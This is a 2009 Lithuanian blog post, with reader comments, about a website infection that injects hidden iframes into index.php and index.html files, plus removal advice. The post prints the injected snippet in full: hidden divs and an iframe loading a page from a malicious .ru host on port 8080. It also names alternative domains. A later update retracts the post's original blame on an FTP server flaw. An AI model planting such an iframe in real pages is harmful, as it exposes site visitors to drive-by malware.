Siaučia HTML:Illiframe-C [Trj] trojan virusas
Update: Want to read in english? See google translate.
Internete siaučia virusas, kuris laužia svetaines pasinaudodamas proFTPd serviso pažeidžiamumu, kuris ko gero atrastas visai naujai, nes kol kas, mano žiniomis, nėra atnaujinimų šiai klaidai spręsti. Ko gero vienintelis apsisaugojimo būdas yra FTP blokavimas arba leidimas jungtis tik iš žinomų IP adresų.
Įsibrovęs virusas pakeičia visus FTP index.php ir index.html failus ir prideda į juos tokį kodą:
<div style=”display:none”></div>
<div style=”display:none”></div>
<div style=”display:none”></div>
<div style=”display:none”></div>
<div style=”display:none”></div>
<div style=”display:none”></div>
<div style=”display:none”></div>
<div style=”display:none”>
<iframe width=339 height=853 src=”http://deathtesting.ru:8080/index.php” ></iframe>
</div>
deathtesting.ru gali būti kitoks, pvz: ofiget.ru, open-life.ru, offlife.ru ir kitokie.
Norint pašalinti šį nemalonų dalyką, reikia ištrinti nurodytas eilutes iš VISŲ index.html ir index.php failų esančių pasirinktame FTP.
Jeigu manote, kad Jūsų svetainė dar nepaleista ir ji nepažeidžiama taip pat klystate. Nulaužia net nežinomas svetaines. Priklauso nuo to, koks FTP servisas yra naudojamas.
UPDATE: O pasirodo proFTPd buvo apkaltintas visai nepelnytai. Pasirodo pasigavau trojana vagianti slaptazodzius. Avast’as kazkodel nesurado, pavyko tik Kasperskiui. Vis dar nepriprantu, kad Windows’uose reikia saugotis virusu ir kitokios bjaurasties, juk vis delto naudojau Linux’a kaip pagrindine OS kokius 6-7 metus is eiles. Svarstau, gal vel pereiti prie Linux + Virtualizuoti Windows. Dilema.

September 28th, 2009 at 14:09
Jo, jau turiu patirties su siuo reikalu - serveriais nesusijusias mano svetaines “pagavo” sis virusas… Pradzioj maniau, jog kompe isiveise kazkas, bet jokios antivirusines nezviegia, o svetaines, kuriu jau metus nelieciau taip pat uzsikrete.
O kaip atrodo tas FTP blokavimas? I ka reiktu kreiptis? I hostingo tiekejus?
September 28th, 2009 at 14:15
Na, manau, kad taip. Bet atrodo, tai netgi nepadeda. Pranešiu, kai bus naujienų.
September 28th, 2009 at 17:22
Na naudoju vsftpd, tai gal nenulūšiu.
September 28th, 2009 at 18:12
Na, lauksim lauksim..
September 29th, 2009 at 14:08
http://www.esaugumas.lt/index.php?1062398694
Baronka kalbantiems, kad nereikia nuolat atnaujinti naudojamos OS ir kitos programinės įrangos…
October 19th, 2009 at 14:56
O kodėl nebenaudoji FAILixo?
November 21st, 2009 at 14:00
o galu gale approvino tavo komentara
November 24th, 2009 at 16:44
e lol
November 24th, 2009 at 16:47
Nebenaudoju Linuxo, jau gana seniai. Darbo specifika priverte prie Win pargrįžt
November 26th, 2009 at 10:45
o tai kokia ta tavo darbo specifika? .NET ar tai draiveriu programuotojas?
November 26th, 2009 at 10:47
Didžiojo hadronų priešpriešinių srautų greitintuvo gautų duomenų apdorojimas ir analizė
January 22nd, 2010 at 12:31
pats metas uzdaryti sita bloga, ane?
January 22nd, 2010 at 12:33
I’ll be back
January 24th, 2010 at 02:33
sure you will